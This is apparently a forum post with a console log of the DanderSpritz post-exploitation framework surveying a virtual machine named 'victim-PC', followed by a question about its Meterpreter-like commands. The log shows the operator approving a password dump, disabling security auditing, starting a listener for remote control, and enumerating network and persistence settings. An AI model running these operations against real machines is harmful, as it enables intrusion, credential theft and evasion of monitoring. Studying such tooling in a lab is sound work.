| SERVICE | COM job ClassID and data: {900BE39D-6BE8-461A-BC4D-B0FA71F5ECB1} - | | | HIGHEST | WDI\ResolutionHost |
| SERVICE | %%%%windir%%%%\system32\wermgr.exe -queuereporting (runs in "") | LOGON | LOGON | LEAST | Windows Error Reporting\QueueReporting |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange (runs in "") | EVENT | EVENT | SYSTEM LEAST | Windows Filtering Platform\BfeOnServiceStartTypeChange |
| | SERVICE | "%%%%ProgramFiles%%%%\Windows Media Player\wmpnscfg.exe" (runs in "") | EVENT | EVENT | LEAST | Windows Media Sharing\UpdateLibrary | | |
| | SERVICE | %%%%systemroot%%%%\System32\sdclt.exe /CONFIGNOTIFICATION (runs in "") | DAILY 2010-11-27T10:00:00 | DAILY 2010-11-27T10:00:00 | LOCAL SERVICE LEAST | WindowsBackup\ConfigNotification | | |
| | SERVICE | c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan (runs in "") | DAILY 2000-01-01T04:09:42 2100-01-01T00:00:00 | DAILY 2000-01-01T04:09:42 2100-01-01T00:00:00 | SYSTEM HIGHEST | Windows Defender\MP Scheduled Scan | | |
| - [2017-04-15 16:02:34 z0.0.0.13] =============================== Persistence checks =============================================================== | |
| - | Path/Key | File/Value | Data | | |
| - +------------------------------------------------------------+---------------+------------------------------------------+ | |
| - | system\currentcontrolset\Services\tcpip\Parameters\Winsock | HelperDllName | %%%%SystemRoot%%%%\System32\wshtcpip.dll | | |
| - | Software\Microsoft\Windows NT\CurrentVersion\Windows | AppInit_Dlls | | | |
| - | Software\Microsoft\Windows NT\CurrentVersion\winlogon | Shell | explorer.exe | | |
| - | Software\Microsoft\Windows NT\CurrentVersion\winlogon | Userinit | C:\Windows\system32\userinit.exe, | | |
| - [2017-04-15 16:02:36 z0.0.0.13] Saved safety handlers for future op(s) | |
| - [2017-04-15 16:02:37 z0.0.0.13] ================================== Password dump ================================================================== | |
| - [2017-04-15 16:02:37 z0.0.0.13] 1 safety handler registered for passworddump | |
| I think it's safe to run passworddump. Do you want to run it? | |
| YES | |
| - [2017-04-15 16:02:52 z0.0.0.13] ================================= OS information ================================================================= | |
| - [2017-04-15 16:02:52 z0.0.0.13] Data age: 24:44 (from local cache, re-run manually if you need to) | |
| - OS installed on Sat Apr 15 00:34:19 2017 | |
| - System language settings | |
| Locale: English (USA) | |
| Installed: English (USA) | |
| UI: English (USA) | |
| OS: English (USA) | |
| - System version information | |
| Version: 6.1.1.0 Build 7601 winnt i386 Service Pack 1 | |
| - [2017-04-15 16:02:53 z0.0.0.13] ============================= Networking Information ============================================================= | |
| FQDN: victim-PC | |
| DNS Servers: 195.130.131.1, 195.130.130.1 | |
| - [2017-04-15 16:02:53 z0.0.0.13] Showing all non-local and non-tunnel encapsulation adapter information, see command 1206 for full interface list | |
| | Description | MAC | IP | Netmask | Gateway | DHCP Server | Name | | |
| +--------------------------------------+-------------------+---------------+---------------+---------------------------------+-------------+----------------------------------------------------------------+ | |
| | Intel(R) PRO/1000 MT Desktop Adapter | 08-00-27-BB-EF-C8 | 192.168.0.249 | 255.255.255.0 | fe80::de53:7cff:fef2:b96e%%%%11 | 192.168.0.1 | Local Area Connection ({C63B0135-2C21-412E-92E7-A6FEB149081E}) | | |
| - ------------------------------------------------------------------- Route table ------------------------------------------------------------------- | |
| - [2017-04-15 16:02:53 z0.0.0.13] Data age: 24:43 (from local cache, re-run manually if you need to) | |
| | Dest. network | Mask | Gateway | Interface | Metric | Origin | | |
| +-----------------------------------------+-----------------+---------------------------+---------------+--------+-----------+ | |
| | 0.0.0.0 | 0.0.0.0 | 192.168.0.1 | 192.168.0.249 | 10 | MANUAL | | |
| | 127.0.0.0 | 255.0.0.0 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL | | |
| | 127.0.0.1 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL | | |
| | 127.255.255.255 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL | | |
| | 192.168.0.0 | 255.255.255.0 | 0.0.0.0 | 192.168.0.249 | 266 | MANUAL | | |
| | 192.168.0.249 | 255.255.255.255 | 0.0.0.0 | 192.168.0.249 | 266 | MANUAL | | |
| | 192.168.0.255 | 255.255.255.255 | 0.0.0.0 | 192.168.0.249 | 266 | MANUAL | | |
| | 224.0.0.0 | 240.0.0.0 | 0.0.0.0 | 127.0.0.1 | 306 | WELLKNOWN | | |
| | 224.0.0.0 | 240.0.0.0 | 0.0.0.0 | 192.168.0.249 | 266 | WELLKNOWN | | |
| | 255.255.255.255 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL | | |
| | 255.255.255.255 | 255.255.255.255 | 0.0.0.0 | 192.168.0.249 | 266 | MANUAL | | |
| | :: | 0 | fe80::de53:7cff:fef2:b96e | 192.168.0.249 | 26 | ROUTER_AD | | |
| | ::1 | 128 | :: | 127.0.0.1 | 306 | MANUAL | | |
| | 2001:: | 32 | :: | | 8 | ROUTER_AD | | |
| | 2001:0:9d38:6abd:488:1cb2:ae5b:d867 | 128 | :: | | 256 | MANUAL | | |
| | 2a02:1811:241e:5c00:: | 64 | :: | 192.168.0.249 | 18 | ROUTER_AD | | |
| | 2a02:1811:241e:5c00:: | 64 | fe80::de53:7cff:fef2:b96e | 192.168.0.249 | 266 | ROUTER_AD | | |
| | 2a02:1811:241e:5c00:301a:5a76:66cf:2906 | 128 | :: | 192.168.0.249 | 266 | MANUAL | | |
| | 2a02:1811:241e:5c00:4862:ad35:9a1d:cbc | 128 | :: | 192.168.0.249 | 266 | MANUAL | | |
| | fe80:: | 64 | :: | 192.168.0.249 | 266 | MANUAL | | |
| | fe80:: | 64 | :: | | 256 | MANUAL | | |
| | fe80::5efe:c0a8:f9 | 128 | :: | | 256 | MANUAL | | |
| | fe80::488:1cb2:ae5b:d867 | 128 | :: | | 256 | MANUAL | | |
| | fe80::301a:5a76:66cf:2906 | 128 | :: | 192.168.0.249 | 266 | MANUAL | | |
| | ff00:: | 8 | :: | 127.0.0.1 | 306 | WELLKNOWN | | |
| | ff00:: | 8 | :: | | 256 | WELLKNOWN | | |
| | ff00:: | 8 | :: | 192.168.0.249 | 266 | WELLKNOWN | | |
| - -------------------------------------------------------------------- ARP table -------------------------------------------------------------------- | |
| - [2017-04-15 16:02:53 z0.0.0.13] Data age: 24:42 (from local cache, re-run manually if you need to) | |
| | IP | Type | Interface | MAC | | |
| +-------------------------------------+------+---------------+-------------------------------------------+ | |
| | 224.0.0.22 | | 127.0.0.1 | | | |
| | 239.255.255.250 | | 127.0.0.1 | | | |
| | 192.168.0.1 | | 192.168.0.249 | DC-53-7C-F2-B9-6E | | |
| | 192.168.0.114 | | 192.168.0.249 | 5C-E0-C5-5A-05-5F | | |
| | 192.168.0.118 | | 192.168.0.249 | 08-00-27-A0-13-50 | | |
| | 192.168.0.255 | | 192.168.0.249 | FF-FF-FF-FF-FF-FF | | |
| | 224.0.0.22 | | 192.168.0.249 | 01-00-5E-00-00-16 | | |
| | 224.0.0.252 | | 192.168.0.249 | 01-00-5E-00-00-FC | | |
| | 224.0.0.253 | | 192.168.0.249 | 01-00-5E-00-00-FD | | |
| | 239.255.255.250 | | 192.168.0.249 | 01-00-5E-7F-FF-FA | | |
| | 255.255.255.255 | | 192.168.0.249 | FF-FF-FF-FF-FF-FF | | |
| | ff02::c | | 127.0.0.1 | | | |
| | ff02::16 | | 127.0.0.1 | | | |
| | ff02::1:2 | | 127.0.0.1 | | | |
| | 2001:0:9d38:6abd:4af:37e6:ae5b:d867 | | | 00-00-00-00-00-00-04-AF-37-E6-3F-57-FF-89 | | |
| | ff02::2 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 | | |
| | ff02::16 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 | | |
| | ff02::1:2 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 | | |
| | ff02::1:ff5b:d867 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 | | |
| | fe80::ac72:89df:85b6:949b | | 192.168.0.249 | 08-00-27-A0-13-50 | | |
| | fe80::de53:7cff:fef2:b96e | | 192.168.0.249 | DC-53-7C-F2-B9-6E | | |
| | ff02::2 | | 192.168.0.249 | 33-33-00-00-00-02 | | |
| | ff02::c | | 192.168.0.249 | 33-33-00-00-00-0C | | |
| | ff02::16 | | 192.168.0.249 | 33-33-00-00-00-16 | | |
| | ff02::1:2 | | 192.168.0.249 | 33-33-00-01-00-02 | | |
| | ff02::1:3 | | 192.168.0.249 | 33-33-00-01-00-03 | | |
| | ff02::1:ff1d:cbc | | 192.168.0.249 | 33-33-FF-1D-0C-BC | | |
| | ff02::1:ffb6:949b | | 192.168.0.249 | 33-33-FF-B6-94-9B | | |
| | ff02::1:ffcf:2906 | | 192.168.0.249 | 33-33-FF-CF-29-06 | | |
| | ff02::1:fff2:b96e | | 192.168.0.249 | 33-33-FF-F2-B9-6E | | |
| - ----------------------------------------------------- Getting the pipelist in the background ----------------------------------------------------- | |
| - --------------------------------------------------------------------- NETBIOS --------------------------------------------------------------------- | |
| Running command 'netbios ' | |
| --------------------------------------------------------------------- | |
| VICTIM-PC UNIQUE REGISTERED File Server Service | |
| VICTIM-PC UNIQUE REGISTERED Workstation Service | |
| WORKGROUP GROUP REGISTERED Domain Name | |
| WORKGROUP GROUP REGISTERED Browser Service Elections | |
| Adapter Address: 08.00.27.bb.ef.c8 | |
| Adapter Type : Ethernet Adapter | |
| Command completed successfully | |
| Do you want to run background netmap -minimal? | |
| YES | |
| - Netmap will require user credentials (and probably won't work on 2K8) | |
| - If you want to run netmap, you have to go run "duplicatetoken -duplicate" or logonasuser for me | |
| Do you want to do this? | |
| NO | |
| - [2017-04-15 16:03:57 z0.0.0.13] Can't get netmap without creds | |
| - [2017-04-15 16:03:58 z0.0.0.13] ============================ Memory usage information ============================================================ | |
| - [2017-04-15 16:03:58 z0.0.0.13] 1 safety handler registered for memory | |
| - [2017-04-15 16:03:58 z0.0.0.13] Data age: 25:29 (from local cache, re-run manually if you need to) | |
| - Memory Load : 52%% | |
| - Physical Available: 240 M | |
| - Physical Total : 511 M | |
| - [2017-04-15 16:03:59 z0.0.0.13] ============================ Disk list and space info ============================================================ | |
| - [2017-04-15 16:03:59 z0.0.0.13] Data age: 25:28 (from local cache, re-run manually if you need to) | |
| | Drive | Serial | Type | In use (MB) | Change (MB) | | |
| +-------+-----------+-------+--------------------+-------------+ | |
| | C | f008-53db | Fixed | 10473/15256 (68%%) | 0 | | |
| | D | | Cdrom | | | | |
| - [2017-04-15 16:04:00 z0.0.0.13] ================================= USB survey info ================================================================= | |
| - [2017-04-15 16:04:00 z0.0.0.13] System\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b} data is only 0:25:25.829000 old, was not re-run | |
| - [2017-04-15 16:04:00 z0.0.0.13] SYSTEM\CurrentControlSet\Enum\USB data is only 0:25:24.881000 old, was not re-run | |
| - [2017-04-15 16:04:00 z0.0.0.13] SYSTEM\CurrentControlSet\Enum\USBSTOR not found | |
| - [2017-04-15 16:04:00 z0.0.0.13] Showing recent USB devices | |
| [2017-04-16 03:50:02] ##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} | |
| [2009-07-14 04:52:51] ##?#SCSI#Disk&Ven_Dell&Prod_VIRTUAL_DISK#6&17b13437&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} | |
| [2010-11-20 21:47:52] ##?#SCSI#Disk&Ven_Dell&Prod_VIRTUAL_DISK#6&3af2ddc5&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} | |
| - [2017-04-15 16:04:02 z0.0.0.13] User info started in the background as command ID 1371. | |
| - [2017-04-15 16:04:03 z0.0.0.13] Extra info to get started in the background as command ID 1372. | |
| Running command 'python diffhour.py -args "-safe -sysdrive -recursive"' | |
| - [2017-04-15 16:04:06 z0.0.0.13] Recording initial data, running "dir -mask "*" -path C: -age 1h -recursive" | |
| - [2017-04-15 16:04:06 z0.0.0.13] Running dir -path C: -after "2017-04-15 13:04:08" -mask "*" -recursive -before "2017-04-15 14:04:08" | |
| - [2017-04-15 16:04:16 z0.0.0.13] No changes detected | |
| Command completed successfully | |
| - [2017-04-15 16:04:17 z0.0.0.13] Commands currently running in the background: | |
| | ID | Target | Full Command | Sent | Received | | |
| +------+-----------+--------------------------------------------------------------------------------------------------------+------+----------+ | |
| | 1129 | z0.0.0.13 | keepalive -delay 1m | 109 | 0 | | |
| | 1196 | z0.0.0.13 | script Connected/Connected.dss | 0 | 0 | | |
| | 1197 | z0.0.0.13 | python Connected/Connected.py -project Ops | 0 | 0 | | |
| | 1216 | z0.0.0.13 | python survey.py -args " -run " | 0 | 0 | | |
| | 1220 | z0.0.0.13 | background python monitorwrap.py -args "-g -t OPS_PROCESS_MONITOR_TAG -i 5 -s "processes -monitor " " | 0 | 0 | | |
| | 1221 | z0.0.0.13 | background log=monitor guiflag=monitor processes -monitor | 236 | 981 | | |
| | 1237 | z0.0.0.13 | stopaliasing dst=z0.0.0.13 audit -disable security | 152 | 14 | | |
| Command completed successfully | |
| Command completed successfully | |
| Command completed successfully | |
| Command completed successfully | |
| [23:04:18] Backgrounded 'pc_listen -key "Default" -payload "Danderspritz" -run "memlib" -tcp "443 80 53 1509" -autoaccept ' Id: 1125 | |
| [23:04:18] ID: 1377 '/Local-Only-Command' started [default target: z0.0.0.13] | |
| * Command '/local-only-command' not found | |
| *** Command indicated failure *** | 
  
Does DanderSpritz have any interesting commands like in the Meterpreter shell?